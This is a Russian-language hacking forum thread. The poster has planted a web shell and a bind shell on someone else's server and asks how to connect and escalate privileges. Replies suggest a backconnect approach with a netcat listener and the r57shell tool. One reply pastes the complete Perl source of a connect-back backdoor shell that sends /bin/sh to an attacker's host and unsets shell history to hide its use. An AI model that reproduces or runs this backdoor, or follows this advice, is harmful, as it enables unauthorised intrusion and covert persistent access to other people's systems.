День добрый! Надеюсь, пишу в правильный раздел. Закачал шелл, попал на перспективный и мощный сервак, залил bind.pl, открыл порт... Далее, пишу адрес сервака в netcat буквами, так же в виде ip, всё один хрен получаю: h_errno 11001 HOST_NOT_FOUND, отчего так? Может есть программы, анологичные netcat, которые помогут мне в бравом деле поднятия прав?
Уверен ли ты что запустился бинд.пл, смотри в процесах. Посмотри на какой порт биндишь. Попробуй скачать нет кат с другого сайта. Запуск : site.ru 47111 ; 127.0.0.1 47111 Если не фига не вышло, попробуй сишный бинд.
Вполне вероятно, что на хосте правильно настроенный фаерволл. Попробуй backconnect. Перед запуском backconnect'a на сервере запусти netcat у себя с параметрами -l [порт] Хотя, если фаер действительно правильно настроенный и backconnect не поможет.
HTML: #!/usr/bin/perl use IO::Socket; #IRAN HACKERS SABOTAGE Connect Back Shell #code by:LorD #We Are :LorD-C0d3r-NT # #lord@SlackwareLinux:/home/programing$ perl dc.pl #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- # #Usage: dc.pl [Host] [Port] # #Ex: dc.pl 127.0.0.1 2121 #lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- # #[*] Resolving HostName #[*] Connecting... 127.0.0.1 #[*] Spawning Shell #[*] Connected to remote host #bash-2.05b# nc -vv -l -p 2121 #listening on [any] 2121 ... #connect to [127.0.0.1] from localhost [127.0.0.1] 2121 #--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- # #--==Systeminfo==-- #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux # #--==Userinfo==-- #uid=1001(lord) gid=100(users) groups=100(users) # #--==Directory==-- #/root # #--==Shell==-- # $system = '/bin/sh'; $ARGC=@ARGV; print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n"; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; print "[*] Resolving HostName\n"; print "[*] Connecting... $ARGV[0] \n"; print "[*] Spawning Shell \n"; print "[*] Connected to remote host \n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n"; system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo; echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); system($system); #EOF
Скорее всего бинд блочит фаервол Запусти неткат и там пропиши -l -p 4000 на сервак залей бекдур или пользуйся r57shell там он встроеный уже. Если он бует на перле подними права и пропиши perl ip 4000 И самое важно вписывай именно свой реальный ip